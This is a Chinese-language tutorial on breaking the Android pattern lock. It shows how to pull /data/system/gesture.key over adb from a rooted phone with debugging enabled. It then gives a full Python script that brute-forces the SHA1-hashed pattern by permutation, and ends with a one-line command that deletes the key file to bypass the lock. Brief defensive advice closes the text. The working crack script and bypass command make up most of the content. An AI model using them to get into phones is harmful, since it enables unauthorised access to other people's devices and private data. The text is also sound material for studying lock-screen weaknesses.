安卓手機的圖形鎖包括3*3,4*4,5*5的點陣,按次序連接數個點從而達到鎖定/解鎖的功能。以3*3為例,最少需要連接4個點,最多能連接9個點。在我們進行繪制圖形的過程中,每選中這9個點中的一個點,實際上就代表選中了一位數字。當我們連接完4個點時,產生的圖形也會間接生成一組密碼。比如我們選中02、04、05、08這四個點位,那么組成的密碼即為02040508。當然,為了安全,生成的密碼是不可能直接被存儲的,於是安卓系統將02040508轉換為16進制並以sha1加密,並存儲在手機里的/data/system/gesture.key 文件中。我們要做的就是破解這個文件中保存的密鑰,通過破解出的密鑰可以得到繪制圖形的點位,從而進入手機系統。
破解有兩個前提條件:
(1)手機需要root;
(2)需要開啟調試模式。
滿足了以上兩個條件,我們便可以開始對安卓手機的圖形密碼進行破解。
首先利用adb進入手機的shell模式。然后adb pull data/system/gesture.key gesture.key。將密鑰存放的文件拷貝到電腦。利用C32Asm打開gesture.key文件,會發現其文件內容為sha1加密。如圖1所示:
圖1
因為該密鑰是基於點位組成的密碼,將sha1密鑰解密后的密碼應該是大於4位小於9位的。密碼數量大概在3024~985824之間。既然密碼的數量已經知道,我們便可以對該密碼進行窮舉破解。
利用python編寫窮舉破解程序:
主要編程思路如下:首先對00-09這些數字進行排列組合,需要用到Python中的itertools模塊,來完成迭代循環操作。組合出來的數字序列在用hashlib模塊對字符串進行SHA1加密,然后對gesture.key文件中的密鑰進行碰撞,知道找到相同的一組數字序列。
代碼:
1 #coding:utf-8 2 import itertools 3 import hashlib 4 import time 5 import os 6 #調用cmd,ADB連接到手機,讀取SHA1加密后的字符串 7 #os.system(r"adb pull /data/system/gesture.key gesture.key") 8 time.sleep(5) 9 f=open('gesture.key','r') 10 pswd=f.readline() 11 f.close() 12 pswd_hex=pswd.encode('hex') 13 print u'加密后的密碼為:%s'%pswd_hex 14 #生成解鎖序列,得到['00','01','02','03','04','05','06','07','08'] 15 matrix=[] 16 for i in range(0,9): 17 str_temp = '0'+str(i) 18 matrix.append(str_temp) 19 #將00——08的字符進行排列,至少取4個數排列,最多全部進行排列 20 min_num=4 21 max_num=len(matrix) 22 list_m=[] 23 for num in range(min_num,max_num+1):#從04 -> 08 24 iter1 = itertools.permutations(matrix,num)#從9個數字中挑出n個進行排列 25 list_m.append(list(iter1))#將生成的排列全部存放到 list_m 列表中 26 27 for i in list_m: 28 for el in i:#遍歷這n個數字的全部排列 29 strlist=''.join(el)#將list轉換成str。[00,03,06,07,08]-->0003060708 30 #print strlist 31 strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#將字符串進行SHA1加密 32 if pswd_hex==strlist_sha1:#將手機文件里的字符串與加密字符串進行對比 33 print u'解鎖密碼為:',strlist
當腳本運行完成后,便會輸出圖形序列的密碼,按照0001020406的排列順序,繪制相應的圖形便可進入手機。
通過這種方式獲取手機權限的限制還是比較多的,首先手機必須是已經root的最高權限,並且開啟了開發者調試模式。
防止以上攻擊方法的防御措施就是關閉開發者調試模式,手機被盜后可以禁止其他人對手機ADB調試破解密碼。另外也要防止木馬被植入手機,因為通過木馬也可以導出手機中的gesture.key密鑰管理文件。
另外,從破解目的來說,如果單單是忘記了自己的手機圖形鎖密碼,完全可以用更簡單的辦法:ADB連接手機,然后“adb rm /data/system/gesture.key”刪除掉gesture.key文件,此時圖形鎖就失效了,隨意畫一下就能解鎖。